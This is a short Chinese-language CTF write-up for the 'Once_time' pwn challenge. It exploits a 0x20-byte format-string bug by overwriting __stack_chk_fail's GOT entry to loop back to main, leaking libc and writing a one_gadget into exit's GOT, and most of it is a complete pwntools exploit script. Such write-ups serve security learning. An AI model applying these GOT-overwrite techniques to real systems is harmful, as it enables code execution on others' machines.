Once_time

fmtstr limited 0x20_byte_lenth pwn by chk

Once_time

这题有个新姿势… 利用修改canary的chk_got来多次利用漏洞 比赛的时候没有做出来…

漏洞

漏洞很简单是一个格式化字符串的漏洞 长度限制在0x20

漏洞利用

• 在name处留下chk_got 并改写为main
• 泄露地址,计算得到one_gadget
• 将one_gadget分次写入ret address
• get shell

  EXP

  ```python

from pwn import * p=process(“./once_time”) context.log_level=”debug” fmt=0x4008C5 main=0x400983 chk_got=0x601020 exit_got=0x601060

def msg(c): p.readuntil(“leave a msg: “) p.send(c.ljust(0x20)) def msgplus(addr,c): p.readuntil(“name: “) p.sendline(p64(addr)) msg(c)

one_gadget=0x45216 libc=ELF(“/lib/x86_64-linux-gnu/libc.so.6”) payload=”%2435c%12$hn” msgplus(chk_got,payload) msgplus(exit_got,”%3$lx”) data=”0x”+p.read(12) data=int(data,16) libc.address=data-(0x7ffff7b04260-0x00007ffff7a0d000) log.success(hex(libc.symbols[‘system’])) raw=one_gadget+libc.address p1=raw&0xffff raw=raw»16 p2=raw&0xffff raw=raw»16 p3=raw&0xffff

log.success(p1) log.success(p2) log.success(p3) msgplus(exit_got+0x0,”%{}c%12$hn”.format(str(p1)))#1 msgplus(exit_got+0x2,”%{}c%12$hn”.format(str(p2)))#2 msgplus(exit_got+0x4,”%{}c%12$hn”.format(str(p3)))#3 gdb.attach(p,’’’ b *0x40097c c ‘’’) msgplus(0xdeadbeef,”%p”)#3 p.interactive()

```